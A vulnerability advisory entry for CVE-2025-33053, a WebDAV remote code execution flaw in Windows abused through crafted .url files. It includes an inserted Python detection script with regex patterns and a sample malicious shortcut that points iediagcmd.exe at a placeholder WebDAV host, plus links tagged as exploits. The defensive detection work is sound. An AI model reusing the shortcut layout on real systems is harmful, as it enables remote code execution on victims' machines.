PT-2025-24329 · Webdav +1
Alexandra Gofman +1 · Published 2025-01-30 · Updated 2025-10-16 · CVE-2025-33053
CVSS v2.0: 10 (High)
Base vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions
Microsoft Windows versions prior to the June 2025 Patch Tuesday update
Description
A remote code execution vulnerability exists in the Web Distributed Authoring and Versioning (WebDAV) component of Microsoft Windows. The flaw allows an attacker to execute arbitrary code on a system by exploiting improper handling of file paths and names, specifically through specially crafted .url files. The vulnerability has been actively exploited by the Stealth Falcon APT group in targeted attacks, particularly against defense and government organizations in the Middle East and Africa. The attackers used this vulnerability to deploy malware, including the Horus Agent, by manipulating the working directory of legitimate Windows tools. The vulnerability is triggered when a user clicks on a malicious link. It is estimated that this vulnerability has been exploited since March 2025. The attacks involve exploitation of the iediagcmd.exe executable. The vulnerability leverages manipulation of the WorkingDirectory parameter within the .url file to point to a malicious WebDAV server.
Recommendations
Apply the June 2025 Patch Tuesday updates to all affected systems to address CVE-2025-33053.
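A triage sketch for the pattern the description names, added here as an example (not code from this advisory or from Microsoft): it flags .url shortcuts whose WorkingDirectory is a remote or WebDAV location. The finding names, the WATCHED_TOOLS list and the sample host and paths are assumptions made for illustration.

```python
import re

# Remote locations: UNC paths (Windows also uses them for WebDAV shares) and
# URLs with a host. A local path such as C:\Tools does not match.
REMOTE = re.compile(r'^(\\\\|//|https?://|file://[^/])', re.IGNORECASE)
# Markers of the WebDAV form of a UNC path, e.g. \\host@SSL@443\DavWWWRoot\dir
WEBDAV = re.compile(r'@ssl|@\d+|davwwwroot', re.IGNORECASE)
# Tool named on this page; extend with other binaries you want to watch.
WATCHED_TOOLS = {'iediagcmd.exe'}

def parse_shortcut(text):
    """Return the [InternetShortcut] keys of a .url file, names lower-cased."""
    section, keys = None, {}
    for raw in text.lstrip('\ufeff').splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].strip().lower()
        elif section == 'internetshortcut' and '=' in line:
            name, value = line.split('=', 1)
            keys[name.strip().lower()] = value.strip().strip('"')
    return keys

def assess(text):
    """Return the list of findings for the contents of one .url file."""
    keys = parse_shortcut(text)
    workdir, target = keys.get('workingdirectory', ''), keys.get('url', '')
    if not REMOTE.match(workdir):
        return []  # absent or local working directory: nothing to flag
    findings = ['remote-working-directory']
    if WEBDAV.search(workdir):
        findings.append('webdav-unc-path')
    # A local program started from a remote directory is the combination the
    # description above attributes to the attacks.
    if not REMOTE.match(target) and target.lower().endswith('.exe'):
        findings.append('local-executable-target')
    if re.split(r'[\\/]', target)[-1].lower() in WATCHED_TOOLS:
        findings.append('watched-tool')
    return findings

# Constructed samples: placeholder host and paths, not from any real file.
SUSPICIOUS = r"""[InternetShortcut]
URL=C:\PLACEHOLDER\iediagcmd.exe
WorkingDirectory=\\dav.example.test@SSL@443\DavWWWRoot\docs
"""
BENIGN = "[InternetShortcut]\nURL=https://www.example.test/\n"

if __name__ == '__main__':
    print(assess(SUSPICIOUS), assess(BENIGN))
```

Run assess() over the contents of .url files collected from mail attachments, download folders and archives; any finding is a reason to inspect the file, not proof of exploitation.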
Exploit
Fix
RCE
Improper Access Control
Related Identifiers
BDU:2025-06673
BDU:2025-06677
CVE-2025-33053
Affected Products
Webdav
Windows
References · 247
- https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept · Exploit
- https://vicarius.io/vsociety/posts/cve-2025-33053-detection-script-remote-code-execution-vulnerability-in-microsoft-webdav · Exploit
- https://vicarius.io/vsociety/posts/cve-2025-33053-mitigation-script-remote-code-execution-vulnerability-in-microsoft-webdav · Exploit
- https://research.checkpoint.com/2025/stealth-falcon-zero-day · Exploit
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053 · Vendor Advisory
- https://nvd.nist.gov/vuln/detail/CVE-2025-33053 · Security Note
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053 · Vendor Advisory
- https://bdu.fstec.ru/vul/2025-06677 · Security Note
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-33053 · Security Note
- https://safe-surf.ru/specialists/bulletins-nkcki/721766 · Security Note
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073 · Vendor Advisory
- https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-33053 · Vendor Advisory
- https://bdu.fstec.ru/vul/2025-06673 · Security Note
- https://github.com/DiscUtils/DiscUtils · Note
- https://github.com/MythicC2Profiles/httpx · Note